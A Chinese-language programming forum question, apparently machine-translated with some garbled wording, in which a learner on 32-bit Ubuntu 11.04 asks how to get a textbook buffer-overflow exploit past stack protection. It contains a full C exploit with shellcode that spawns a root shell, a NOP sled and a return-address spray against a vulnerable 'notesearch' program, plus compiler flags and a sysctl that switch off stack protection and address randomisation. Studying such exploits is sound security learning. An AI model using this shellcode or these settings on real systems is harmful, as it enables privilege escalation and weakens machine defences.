我在2007年的MacBook上運行32位Ubuntu 11.04,並且我剛開始學習緩衝區溢出漏洞。我試圖從書中運行示例程序,但是Ubuntu的安全措施使我無法成功執行緩衝區溢出。下面是我試圖運行代碼:在Ubuntu中禁用堆棧碎片保護11.04
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";
int main(int argc, char *argv[]) {
unsigned int i, *ptr, ret, offset=270;
char *command, *buffer;
command = (char *) malloc(200);
bzero(command, 200); // zero out the new memory
strcpy(command, "./notesearch \'"); // start command buffer
buffer = command + strlen(command); // set buffer at the end
if(argc > 1) // set offset
offset = atoi(argv[1]);
ret = (unsigned int) &i - offset; // set return address
for(i=0; i < 160; i+=4) // fill buffer with return address
*((unsigned int *)(buffer+i)) = ret;
memset(buffer, 0x90, 60); // build NOP sled
memcpy(buffer+60, shellcode, sizeof(shellcode)-1);
strcat(command, "\'");
system(command); // run exploit
free(command);
}
我想導致段錯誤的代碼,但我每次運行它時,它與「德藝雙馨檢測棧」的錯誤退出。我試着用以下選項編譯(使用gcc):
-fno-stack-protector -D_FORTIFY_SOURCE=0 -z execstack
以各種組合,以及所有在一起。我也嘗試$ sysctl -w kernel.randomize_va_space=0
,然後重新編譯,但沒有成功。
請將任何人都可以在執行緩衝區溢出的正確方法是揭示大加讚賞,因爲Ubuntu的內置安全措施
其實'。/ notesearch'有緩衝區溢出漏洞!! – aniliitb10 2015-02-02 13:36:11